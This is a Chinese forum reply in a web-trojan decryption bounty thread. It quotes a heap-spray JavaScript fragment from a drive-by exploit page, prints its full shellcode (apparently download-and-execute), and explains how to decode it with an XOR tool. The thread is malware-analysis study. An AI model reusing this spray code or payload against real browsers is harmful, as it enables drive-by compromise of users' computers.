回复: 网马解密悬赏第三十三期
孔子,悬赏应该已经步入尾声,我可以说说我的办法了吧?
我先说说我的办法吧。
var nop = unescape("%u9090%u9090");
var ptr1 = unescape("%u0e00%u0e00");
var ptr2 = unescape("%u0f80%u0f80");
var array = new Array();
SCSC = unescape(SCSC.replace(/%uzv/g, "%u"));
var fill1 = makevtable(ptr1, ptr2, nop, SCSC);
for (i = 0; i < 220; i++)
{
array[i] = fill1 + 'a';
}
根据这一段来看,还是把ptr1, ptr2, nop, SCSC合并起来比较好,不至于缺失然后把SCSC中的%uzv替换成%u,这样就可以得到一段Shellcode。
%u0e00%u0e00%u0f80%u0f80%u9090%u9090%ue860%u0039%u0000%uc689%uc681%u0071%u0000%uc789%uc781%u0049%u0000%u65ba%u0002%u3100%u31c9%u83db%u02c3%u048a%u301f%u0e04%u3941%u0fd1%u0883%u0000%u0100%u43db%ue383%ueb1f%u61e9%u32e9%u0000%ue800%u0000%u0000%u8358%u44e8%u84c3%ue17b%ue886%ud16f%u8579%u5319%uc395%u1947%u857d%u8f7e%u8580%uf598%u857a%u0d1a%u0fe1%u897c%u440c%u2233%u8811%u6677%u8155%u1c3a%ufc9f%u5ce0%u0c08%ue40c%u0d80%u0c0c%ucc89%u8803%u0d76%u0c0c%u4985%ub5f0%uf72f%ufb9d%u5187%ue4f0%u0dad%u0c0c%ucc89%u8803%u0d6e%u0c0c%u348c%u03cf%u0f88%u0c0c%u4c0c%uf8e7%u4985%ub5f4%uf294%u0286%u5187%ue4f0%u0d71%u0c0c%ucc89%u8803%u0d32%u0c0c%u4985%ub5f8%u4282%ue002%u5187%ue4f0%u0d69%u0c0c%ucc89%u8803%u0d2a%u0c0c%u4985%ub5fc%ua56f%ufeed%u5187%ue4f0%u0d41%u0c0c%ucc89%u8803%u0d02%u0c0c%u4985%ue4e0%uf34f%uf3f3%ucf85%ucf8d%u0d29%u0c0c%uf35f%uf479%u79f3%uf3f4%uf479%u79f3%uf3f4%uf479%ucf85%ucf8d%u0e90%u0c0c%uf35f%uf479%u4987%uf3fc%u89ec%u03cc%ud988%u0c0c%u850c%ue849%u3ab5%u2316%u877c%ue851%uf0e4%u0c0c%u890c%u03cc%ub188%u0c0c%u850c%uec49%u2c64%u0c0e%u810c%ucc81%uf3f7%u5df3%ueae4%uf3f2%u85f3%u8dcf%uabcf%u0c0e%u5f0c%u59f3%u81e0%ucc81%uf3f7%u86f3%u4d0d%ucc88%uf579%uca45%u500d%u4dca%u790d%u4dca%u7c0e%u4dca%u780f%u4dca%u2208%u4dca%u6909%u4dca%u740a%u4dca%u690b%u4dca%u0c04%ua8e4%uf3f2%u85f3%u8dcf%udecf%u0c0d%u5f0c%u79f3%uf3f4%uf479%u79f3%uf3f4%uf479%u79f3%u3df4%u5dc5%u815d%ucc81%uf3f7%u5df3%ucf85%ucf8d%u0ea3%u0c0c%u3d5f%u5ccc%u79f3%u87f4%uec49%uecf3%u64e4%uf3f2%u85f3%u8dcf%u0ecf%u0c0e%u5f0c%u79f3%uf3f4%uf479%u79f3%uf3f4%uf479%u79f3%u3df4%u4dc5%u815d%ucc91%uf3f7%u5ff3%u79f3%u87f4%uf849%uecf3%u6dc5%ucc3d%u3d4c%ucef3%u0c08%u685a%u3cad%u0c0c%u870c%u004c%u7c87%ua110%u4c87%u5204%u5bcf%ucc3d%uf33d%ua0f0%ucc88%u8803%u0c0b%u0c0c%uc3cd%u0d01%ue7cb%u85fc%u53f4%u5acf%u8f5e%u04e0%u0085%u8528%u0fd4%u304c%u4487%u0d74%u87d5%u184d%u4885%u0828%u4d87%u0d2c%u3dd4%u87de%u9c38%ud20d%ue45c%uf3b7%uf3f3%u4837%u0828%u0354%u1289%u0c0c%u870c%u284d%ud40d%u876a%u5c18%uee8d%uf3f3%u0c0c%u4d87%u0d10%u87d4%u9c08%ud40d%u05e5%u0c0c%u4e0c%u5837%u0828%uc97e%ucc3d%uc88f%u5204%ucf56%u7e79%u6160%u6263%u6822%u6060%u4d0c%u5c5c%u4d48%u4d58%u640c%u7878%u367c%u2323%u3d3e%u2235%u3c35%u3d22%u393d%u3e22%u353f%u3523%u6962%u2378%u236a%u6d6a%u6265%u2278%u7c66%u0c6b
将这段代码复制到
http://issmall.isgreat.org/autoxor.htm中,AutoXor后弹出XOR KEY:0x0,点击Decode,即可解出。